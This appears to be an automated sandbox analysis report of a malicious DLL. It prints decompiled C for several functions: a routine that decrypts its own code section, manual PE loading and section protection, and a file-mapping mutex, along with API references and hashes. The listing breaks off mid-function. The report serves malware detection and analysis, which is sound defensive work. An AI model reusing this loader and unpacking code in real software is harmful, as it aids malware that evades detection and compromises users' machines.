Opcode Fuzzy Hash: d344578556c08189a5f5ad3491aa9451239c24cb33cfa83e5c5f531fc7db1e92
Instruction Fuzzy Hash: 2AF01C36605A21BBDF125BA08C4CF9FBB69FB0E751F09C814F61D91150C7218866FBA5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB580, Relevance: 7.9, APIs: 2, Strings: 2, Instructions: 937COMMON

Download Yara Rule

APIs

GetCurrentDirectoryA.KERNEL32(000008DA,6E21DBC8), ref: 6E1DB691
GetTempPathA.KERNEL32(000008DA,6E21DBC8), ref: 6E1DBED8

Strings

$, xrefs: 6E1DBAC8
C:\Users\user\AppData\Local\Temp\, xrefs: 6E1DB687, 6E1DBECE

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: CurrentDirectoryPathTemp
String ID: $$C:\Users\user\AppData\Local\Temp\
API String ID: 783798388-4101747229
Opcode ID: 16002159450b9e821161a926d01914b60b87c0e311beaf278b95039da8d21d95
Instruction ID: fb069ea532264126f65eb2744822f089dbc15e133cfaf228a07c19f1f60f5935
Opcode Fuzzy Hash: 16002159450b9e821161a926d01914b60b87c0e311beaf278b95039da8d21d95
Instruction Fuzzy Hash: B582CE71509755CFC700CF79C4985AABBF2BF9A304F044A2EE185C7788E7348A4ADB62

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DDE91, Relevance: 7.6, APIs: 5, Instructions: 87COMMON

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 6E1DDECE
dllmain_crt_dispatch.LIBCMT ref: 6E1DDEE5
dllmain_raw.LIBCMT ref: 6E1DDF2D
dllmain_crt_dispatch.LIBCMT ref: 6E1DDF40
dllmain_raw.LIBCMT ref: 6E1DDF53

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: e0406f2c18ede161cfb7aefd4797816cb92a6a4d61ba615e4b5e17b78bf9f7f3
Instruction ID: a79e4bcbc0e28f905f3a571f593f5db93484067782be18904e01d93eae4cec40
Opcode Fuzzy Hash: e0406f2c18ede161cfb7aefd4797816cb92a6a4d61ba615e4b5e17b78bf9f7f3
Instruction Fuzzy Hash: 7E219172D04525AFCB518E95CC41EEF3A7DDB90798F124719F8145B250C7348E8AAFE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1918AD, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E6E1918AD(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				unsigned int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed char _v44;
				void* _v48;
				signed int _v56;
				signed int _v60;
				intOrPtr _t50;
				void* _t57;
				void* _t61;
				signed int _t67;
				signed char _t69;
				signed char _t70;
				void* _t76;
				intOrPtr _t77;
				unsigned int _t82;
				intOrPtr _t86;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				signed int _t93;

				_t90 =  *0x6e1941b0;
				_t50 = E6E191000(_t90,  &_v28,  &_v20);
				_v24 = _t50;
				if(_t50 == 0) {
					asm("sbb ebx, ebx");
					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
					_t91 = _t90 + _v28;
					_v48 = _t91;
					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
					_t76 = _t57;
					_v36 = _t76;
					if(_t76 == 0) {
						_v24 = 8;
					} else {
						_t69 = 0;
						if(_t67 <= 0) {
							_t77 =  *0x6e1941cc;
						} else {
							_t86 = _a4;
							_v8 = _t91;
							_v8 = _v8 - _t76;
							_t14 = _t86 + 0x6e195137; // 0x3220a9c2
							_t61 = _t57 - _t91 + _t14;
							_v16 = _t76;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t70 = _t69 + 1;
								_v44 = _t70;
								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
								if(_t82 != 0) {
									_v32 = _v32 & 0x00000000;
									_t89 = _v16;
									_v12 = 0x400;
									do {
										_t93 =  *((intOrPtr*)(_v8 + _t89));
										_v40 = _t93;
										if(_t93 == 0) {
											_v12 = 1;
										} else {
											 *_t89 = _t93 + _v32 - _t82;
											_v32 = _v40;
											_t89 = _t89 + 4;
										}
										_t33 =  &_v12;
										 *_t33 = _v12 - 1;
									} while ( *_t33 != 0);
								}
								_t69 = _v44;
								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
								_v16 = _v16 + 0x1000;
								 *0x6e1941cc = _t77;
							} while (_t69 < _t67);
						}
						if(_t77 != 0x63699bc3) {
							_v24 = 0xc;
						} else {
							memcpy(_v48, _v36, _v20);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v24;
			}

0x6e1918b4
0x6e1918c4
0x6e1918cb
0x6e1918ce
0x6e1918e3
0x6e1918ea
0x6e1918ef
0x6e191900
0x6e191903
0x6e191909
0x6e19190d
0x6e191910
0x6e1919ec
0x6e191916
0x6e191916
0x6e19191a
0x6e1919b2
0x6e191920
0x6e191921
0x6e191926
0x6e191929
0x6e19192c
0x6e19192c
0x6e191933
0x6e191936
0x6e19193e
0x6e19193f
0x6e191940
0x6e191947
0x6e19194b
0x6e191951
0x6e191955
0x6e191957
0x6e19195b
0x6e19195e
0x6e191965
0x6e191968
0x6e19196d
0x6e191970
0x6e191986
0x6e191972
0x6e19197c
0x6e19197e
0x6e191981
0x6e191981
0x6e19198d
0x6e19198d
0x6e19198d
0x6e191965
0x6e191998
0x6e19199b
0x6e19199e
0x6e1919a7
0x6e1919a7
0x6e1919af
0x6e1919be
0x6e1919d3
0x6e1919c0
0x6e1919c9
0x6e1919ce
0x6e1919e4
0x6e1919e4
0x6e1919f3
0x6e1919f9

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E191903
memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E1919C9
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 6E1919E4

Strings

Jun 6 2021, xrefs: 6E191936

Memory Dump Source

Source File: 00000000.00000002.475997474.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000000.00000002.475985829.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476010509.000000006E193000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476032760.000000006E195000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476045243.000000006E196000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Jun 6 2021
API String ID: 4010158826-1013970402
Opcode ID: e8ee4e4a949b38e5488603eee4b54dc60e5c1e3f8eb877a0046a0d7255c938c3
Instruction ID: 1346406d434edd80be1384a1cbd86eb574ac3b26faae65a8df5ae303b5260316
Opcode Fuzzy Hash: e8ee4e4a949b38e5488603eee4b54dc60e5c1e3f8eb877a0046a0d7255c938c3
Instruction Fuzzy Hash: 74417C71E0020A9FDB04CFD9C884ADEBBB9BF49310F258129D90577244D775AA8AEB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1920CE, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E1920CE(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6E191C7D(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6e1920d7
0x6e1920dc
0x6e1920ea
0x6e1920ef
0x6e1920ef
0x6e1920f5
0x6e1920fa
0x6e1920fe
0x6e192102
0x6e192102
0x6e19210c
0x6e192115

APIs

GetCurrentThread.KERNEL32 ref: 6E1920D1
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E1920DC
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E1920EF
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E192102

Memory Dump Source

Source File: 00000000.00000002.475997474.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000000.00000002.475985829.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476010509.000000006E193000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476032760.000000006E195000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476045243.000000006E196000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 398d142731e52752dfb6c2d76c66dae070f98ee105e5f83942e7a9bb639b8818
Instruction ID: 8c5c03243d66b80b71fb21bd9334d7f330e85becc2290d62027ae7763d14eeb7
Opcode Fuzzy Hash: 398d142731e52752dfb6c2d76c66dae070f98ee105e5f83942e7a9bb639b8818
Instruction Fuzzy Hash: 6DE09231305A112B96016B695CC9EAFAB5CEF923307160235F528D21D0CB548C8AF5A5

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DDCDA, Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6E1DDD27

Part of subcall function 6E1DE3BC: RtlInitializeSListHead.NTDLL(6E21CB40), ref: 6E1DE3C1

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E1DDD91
___scrt_fastfail.LIBCMT ref: 6E1DDDDB

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 2097537958-0
Opcode ID: d32d39fa361779e0f7a1d2a1a505ff8ec0291b0b9cd9a98f152ace1e84e2b902
Instruction ID: 5bb4f41757cd3f1bea657ed09e8fd4ddd3fa074dc2458f0592f33a706a42acfa
Opcode Fuzzy Hash: d32d39fa361779e0f7a1d2a1a505ff8ec0291b0b9cd9a98f152ace1e84e2b902
Instruction Fuzzy Hash: 4B215B71A44B41AECF44DBF4D4053DC73A99F1126EF200A55D5469B2C0CB2203CCFEA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E19126D, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E19126D(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6e1941cc;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}

0x6e191277
0x6e191284
0x6e19128a
0x6e191296
0x6e1912a6
0x6e1912a8
0x6e1912b0
0x6e191345
0x6e19134c
0x00000000
0x00000000
0x00000000
0x6e1912b6
0x6e1912b6
0x6e1912b6
0x6e1912ba
0x00000000
0x00000000
0x6e1912c6
0x6e1912ca
0x6e1912ee
0x6e1912f2
0x6e191306
0x6e191306
0x6e19130c
0x6e19131b
0x6e19131f
0x6e191327
0x6e191327
0x6e19132f
0x6e191332
0x6e19133f
0x00000000
0x00000000
0x00000000
0x00000000
0x6e19133f
0x6e1912fa
0x6e1912fe
0x6e191304
0x00000000
0x00000000
0x00000000
0x6e191304
0x6e1912d2
0x6e1912d6
0x6e1912e0
0x6e1912d8
0x6e1912d8
0x6e1912d8
0x00000000
0x6e1912d6
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E1912A6
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E19131B
GetLastError.KERNEL32 ref: 6E191321

Memory Dump Source

Source File: 00000000.00000002.475997474.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000000.00000002.475985829.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476010509.000000006E193000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476032760.000000006E195000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476045243.000000006E196000.00000002.00020000.sdmp Download File

Similarity

API ID: ProtectVirtual$ErrorLast
String ID:
API String ID: 1469625949-0
Opcode ID: b69a66306a410f3a6fa6526b483276df297ad9e40d940d88ed736e3d102cc7e1
Instruction ID: 690eec2b8f267ad21d074c67ee1e0bc335351ece7c3f540b7131597cfbd0f483
Opcode Fuzzy Hash: b69a66306a410f3a6fa6526b483276df297ad9e40d940d88ed736e3d102cc7e1
Instruction Fuzzy Hash: 90218631A00207DFCB14DFD5C481AAAF7F9FF04319F114859D11697984E3B8A6D9EB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1914E8, Relevance: 4.6, APIs: 3, Instructions: 60
stringthreadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E6E1914E8() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t23;
				int _t24;
				void* _t28;
				intOrPtr* _t30;
				signed int _t34;
				intOrPtr _t36;

				_push(0);
				_push(0x6e1941c4);
				_push(1);
				_push( *0x6e1941d0 + 0x6e195089);
				 *0x6e1941c0 = 0xc;
				 *0x6e1941c8 = 0; // executed
				L6E191DA8(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E6E191697( &_v44,  &_v28,  *0x6e1941cc ^ 0xfd7cd1cf) == 0) {
					_t23 = 0xb;
					L7:
					ExitThread(_t23);
				}
				_t24 = lstrlenW( *0x6e1941b8);
				_t7 = _t24 + 2; // 0x2
				_t10 = _t24 + _t7 + 8; // 0xa
				_t28 = E6E191144(_t36, _t10,  &_v48,  &_v52); // executed
				if(_t28 == 0) {
					_t30 = _v52;
					 *_t30 = 0;
					if( *0x6e1941b8 == 0) {
						 *((short*)(_t30 + 4)) = 0;
					} else {
						E6E192118(_t40, _t30 + 4);
					}
				}
				_t23 = E6E191444(_v44); // executed
				goto L7;
			}

0x6e1914fa
0x6e1914fb
0x6e191500
0x6e191508
0x6e191509
0x6e191513
0x6e191519
0x6e191522
0x6e191527
0x6e191545
0x6e19159a
0x6e19159b
0x6e19159c
0x6e19159c
0x6e19154d
0x6e191553
0x6e191561
0x6e191565
0x6e19156c
0x6e191574
0x6e191578
0x6e19157a
0x6e191589
0x6e19157c
0x6e191582
0x6e191582
0x6e19157a
0x6e191591
0x00000000

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6E1941C4,00000000), ref: 6E191519
lstrlenW.KERNEL32(?,?,?), ref: 6E19154D

Part of subcall function 6E191144: GetSystemTimeAsFileTime.KERNEL32(?), ref: 6E191151
Part of subcall function 6E191144: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E191167
Part of subcall function 6E191144: _snwprintf.NTDLL ref: 6E19118C
Part of subcall function 6E191144: CreateFileMappingW.KERNELBASE(000000FF,6E1941C0,00000004,00000000,?,?), ref: 6E1911B1
Part of subcall function 6E191144: GetLastError.KERNEL32 ref: 6E1911C8
Part of subcall function 6E191144: CloseHandle.KERNEL32(00000000), ref: 6E1911FD

ExitThread.KERNEL32 ref: 6E19159C

Memory Dump Source

Source File: 00000000.00000002.475997474.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000000.00000002.475985829.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476010509.000000006E193000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476032760.000000006E195000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476045243.000000006E196000.00000002.00020000.sdmp Download File

Similarity

API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
String ID:
API String ID: 4209869662-0
Opcode ID: 834b4659a4ff4ca12376345482b0fe57d3b1ddc11344eacb2d0f5392e09c6fa2
Instruction ID: 0d27e4a292c54430c86f76bd55393a6da6d2f258e38ee03f67fe2b50d3d12926
Opcode Fuzzy Hash: 834b4659a4ff4ca12376345482b0fe57d3b1ddc11344eacb2d0f5392e09c6fa2
Instruction Fuzzy Hash: 5E119DB2604601AFEB11CFA4C888E8B7BECBB56704F024926F525D7190D730E5C9BB92

Uniqueness

Uniqueness Score: -1.00%

Function 6E191ADB, Relevance: 2.5, APIs: 2, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E6E191ADB(void* __ecx) {
				void* _v8;
				char _v12;
				signed short _t15;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E6E191697( &_v8,  &_v12,  *0x6e1941cc ^ 0x196db149) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E6E192087(_t22, _v8,  *0x6e1941cc ^ 0x6e49bbff);
					}
					if(_t29 != 0) {
						_t15 = E6E191E8A(_t22); // executed
						_v12 = _t15 & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x6e194190, 0, _v8);
				}
				return _t25;
			}

0x6e191adb
0x6e191ade
0x6e191adf
0x6e191af5
0x6e191afe
0x6e191b03
0x6e191b1c
0x6e191b05
0x6e191b18
0x6e191b18
0x6e191b20
0x6e191b22
0x6e191b2a
0x6e191b32
0x6e191b3a
0x6e191b3c
0x6e191b3c
0x6e191b3a
0x6e191b4c
0x6e191b4c
0x6e191b57

APIs

StrStrIA.KERNELBASE(00000000,6E191CE6,?,6E191CE6,?,00000000,00000000,?,?,?,6E191CE6), ref: 6E191B32
HeapFree.KERNEL32(00000000,?,?,6E191CE6,?,00000000,00000000,?,?,?,6E191CE6), ref: 6E191B4C

Memory Dump Source

Source File: 00000000.00000002.475997474.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000000.00000002.475985829.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476010509.000000006E193000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476032760.000000006E195000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476045243.000000006E196000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 8a6ee69a6f87f5dbf65bafac179139d3fd9541246875d3e84585dd2dee0dd25f
Instruction ID: c74de4a18d2379e02377e5cbcb4a2149acc1dc2a5e47de33869b2355c5d98531
Opcode Fuzzy Hash: 8a6ee69a6f87f5dbf65bafac179139d3fd9541246875d3e84585dd2dee0dd25f
Instruction Fuzzy Hash: 83018F76B00515ABCB01CBE5CC40EDF7BBEFB95640F168162A912E3144E631EA85BBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DC640, Relevance: 1.8, APIs: 1, Instructions: 343COMMON

Download Yara Rule

APIs

GetTempPathA.KERNELBASE(000008DA,?), ref: 6E1DC6F8

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: PathTemp
String ID:
API String ID: 2920410445-0
Opcode ID: 18a21929b48fba404f9c0cca58499309234a91a884e7a85b023db81ba5b5f9fd
Instruction ID: ddb3c9739ccf019c4df0dd3117abfbdb8b43b7c57933021da00f2ae3487aa757
Opcode Fuzzy Hash: 18a21929b48fba404f9c0cca58499309234a91a884e7a85b023db81ba5b5f9fd
Instruction Fuzzy Hash: D8D1C372901515CFCB04CFB8C8996ED7BB2FB8A310B14462DE5119BB88EB345E46DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1FD792, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,6E21B004,00000000), ref: 6E1FD7D3

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5295e3e073f0a3a94023bc4227f7272d2f51c7c9fee42e3111d83e0c73901264
Instruction ID: c016543a047386f145fcebc4dbfd8cefec881475dc5b27b249583eebd46a6a9f
Opcode Fuzzy Hash: 5295e3e073f0a3a94023bc4227f7272d2f51c7c9fee42e3111d83e0c73901264
Instruction Fuzzy Hash: 1BF02B32A00965DAEB406AE68C14B6B37DDAF42778B104311D8149F484CB60D8839EE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E200101, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?), ref: 6E200133

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 90672d539c90a76b04045d5b9f460f897f79d12de13ce994603e872b0be107df
Instruction ID: 8219b189aaffa878fab854d9feca174640d1aaf472ea5e7ac7f12b1203f6c140
Opcode Fuzzy Hash: 90672d539c90a76b04045d5b9f460f897f79d12de13ce994603e872b0be107df
Instruction Fuzzy Hash: 78E0E53150061B97FB502EE98C04F96F69F9F027B2F080820DC18970C0FB60C802C5F1

Uniqueness

Uniqueness Score: -1.00%

Function 6E191444, Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6E191444(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6e1941cc;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1941cc - 0x63698bc4 &  !( *0x6e1941cc - 0x63698bc4);
				_t18 = E6E191060( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1941cc - 0x63698bc4 &  !( *0x6e1941cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1941cc - 0x63698bc4 &  !( *0x6e1941cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6E191A5A(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E6E191F7C(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E6E19126D(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6E19142F(_t42);
					L8:
					return _t29;
				}
			}

0x6e19144c
0x6e19144e
0x6e19146a
0x6e19147b
0x6e191482
0x6e1914e0
0x00000000
0x6e191484
0x6e191484
0x6e19148e
0x6e191492
0x6e191497
0x6e19149a
0x6e19149f
0x6e1914a3
0x6e1914a8
0x6e1914ad
0x6e1914b1
0x6e1914b6
0x6e1914b7
0x6e1914bb
0x6e1914c0
0x6e1914c8
0x6e1914c8
0x6e1914c0
0x6e1914b1
0x6e1914a3
0x6e1914ca
0x6e1914d3
0x6e1914d7
0x6e1914e1
0x6e1914e7
0x6e1914e7

APIs

Part of subcall function 6E191060: GetModuleHandleA.KERNEL32(?,00000020), ref: 6E191084
Part of subcall function 6E191060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1910A6
Part of subcall function 6E191060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1910BC
Part of subcall function 6E191060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1910D2
Part of subcall function 6E191060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1910E8
Part of subcall function 6E191060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1910FE

Part of subcall function 6E191A5A: memcpy.NTDLL(?,?,?,?,?,?,?,?,6E19148E,?), ref: 6E191A87
Part of subcall function 6E191A5A: memcpy.NTDLL(?,?,?), ref: 6E191ABA

Part of subcall function 6E191F7C: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E191FB4

Part of subcall function 6E19126D: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E1912A6
Part of subcall function 6E19126D: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E19131B
Part of subcall function 6E19126D: GetLastError.KERNEL32 ref: 6E191321

GetLastError.KERNEL32 ref: 6E1914C2

Memory Dump Source

Source File: 00000000.00000002.475997474.000000006E191000.00000020.00020000.sdmp, Offset: 6E190000, based on PE: true

Associated: 00000000.00000002.475985829.000000006E190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476010509.000000006E193000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.476032760.000000006E195000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.476045243.000000006E196000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
String ID:
API String ID: 2673762927-0
Opcode ID: bbff40afbdad9cbe474d32b9c5946dd0a37b7c14d74fd1809d557d142388aead
Instruction ID: d92bed6fbf5bfba21bdaf7b3673efa84f3818dbeda8aa43133746f9918d67f2b
Opcode Fuzzy Hash: bbff40afbdad9cbe474d32b9c5946dd0a37b7c14d74fd1809d557d142388aead
Instruction Fuzzy Hash: 3B1108767007056BD7109AE98C80DDA77FCBF4C2047164969E90597145EBA0ED8AB7A0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E1E1727, Relevance: 58.9, APIs: 32, Strings: 1, Instructions: 1115COMMON

Download Yara Rule

APIs

operator+.LIBVCRUNTIME ref: 6E1E1790
DName::operator+.LIBCMT ref: 6E1E18E4
DName::operator+.LIBCMT ref: 6E1E1901

Strings

/, xrefs: 6E1E2028

Memory Dump Source

Source File: 00000000.00000002.476065559.000000006E19E000.00000020.00020000.sdmp, Offset: 6E19E000, based on PE: false

Similarity

API ID: Name::operator+$operator+
String ID: /
API String ID: 1595903985-2043925204
Opcode ID: 78be6a9b78aaaa1abb3c683c65c9aaa8d122f1dc7f3f6184b84758a3a38cb807
Instruction ID: e0fa9ae2b21d85529371599dc4105ac1efb40e3961e9f78d135d806566e3ec16
Opcode Fuzzy Hash: 78be6a9b78aaaa1abb3c683c65c9aaa8d122f1dc7f3f6184b84758a3a38cb807
Instruction Fuzzy Hash: 7F826976E10A0A9BDF09CFD4C891BEEB7B9BF58310F104529F516E7680DB349A88DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E191F10, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E191F10() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x6e1941b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6e1941bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x6e1941ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x6e1941a8 = _t5;
					 *0x6e1941b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x6e1941a4 = _t6;
					if(_t6 == 0) {
						 *0x6e1941a4 =  *0x6e1941a4 | 0xffffffff;
					}
					return 0;
				}
			}

0x6e191f11
0x6e191f1f
0x6e191f27
0x6e191f2c
0x6e191f76
0x6e191f76
0x6e191f2e
0x6e191f36
0x6e191f72
0x6e191f74
